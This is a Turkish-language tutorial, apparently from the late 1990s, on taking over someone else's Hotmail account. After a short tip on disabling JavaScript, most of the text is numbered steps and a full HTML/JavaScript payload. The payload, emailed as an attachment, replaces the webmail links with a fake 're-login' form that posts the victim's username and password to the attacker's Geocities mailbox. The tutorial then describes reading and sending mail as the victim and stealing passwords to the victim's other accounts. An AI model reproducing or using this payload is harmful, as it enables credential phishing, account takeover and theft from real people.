Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasil mi oluyor?
Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i görüntüledigi zaman Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasini söylüyor.Tabii böyle olunca size kurbanin kullanici adi ve ip adresini iceren bir e-mail geliyor.
Tabii siz kullanici adini ve sifresini ögrendiginiz zaman hesabin tam kullanin hakkini kazaniyorsunuz.silmek, okumak, kurban adina mailler göndermek... Tabii siz bos durmayip POP Mail'leride kontrol ediyorsunuz ve kurbanin diger sitelerdeki hesaplarinin sifrelerini aliyorsunuz.
Peki bu olaydan kurtulamayacagiz mi ??
Netscape kullanicilari javascript ayarlarini söyle kapatabilir. (edit / preferences / advanced / disablejavascript).
Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir. (view / internet options /security / custom settings / scripting / disable active scripting).
Tabii En Önemlisi Baskasinin Hotmail Hesabini Nasil Ele Geciririz ???
Asagidaki Listedekiler elimizde olmali.
1.ADIM
hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.
2.ADIM:
Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda e-mail adresini kullandik.ve geocities'ten bir e-mail adresi aldik.örnegin(ybwc@geocities.com).
3.ADIM:
NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit ediyoruz. Satir 17'de Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi. (bu kullanici adini kendinize göre degistirin.)
<html><head></head><body>
<p>"Go where you want today" - Blue
Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5
width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\"
size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request"
+
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\"
size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\"
size=\"3\" color=\"#ff0000\"><b>Time
expired. Please re-login.</b></font><br>"
+
"<font face=\"Arial, Helvetica\"
size=\"2\"><a
href=\"http://www.hotmail.com/errormsg.html\">(Get
more info regarding error messages
here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td
align=\"center\">" +
"<FORM METHOD=POST
ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\"
NAME=\"next-url\"
VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\"
NAME=\"subject\" VALUE=\"Hotmail
Password\">" +
"<table cellpadding=\"0\"
cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial,
Helvetica\" size=\"2\">Login
Name:</font><br><input type=\"text\"
name=\"login\" size=\"16\"
maxlength=\"16\"></td><td><font
face=\"Arial, Helvetica\"
size=\"2\">Password:</font><br><input
type=\"password\" name=\"passwd\"
size=\"16\"
maxlength=\"16\"> <input
type=\"submit\"
value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2
align=center>" +
"<font face=\"Arial, Helvetica\"
size=\"3\">" +
"Return to <a
href=\"http://welcome.to/www.hotmail.com\"
target=\"_parent\">Hotmail's
Homepage</a>." +
"</font></th></tr></table>" +
"<p><img
src=\"http://209.1.112.251/c9698.gif\" width=189
height=16 border=0 alt=\"Copyright
1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>
4.ADIM
kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban, (victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve gönderiyoruz.
5.ADIM
Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail aliyoruz. Tabii bu mail'de kurbanimizin kullanici adi, sifresi ve ip adresi oluyor...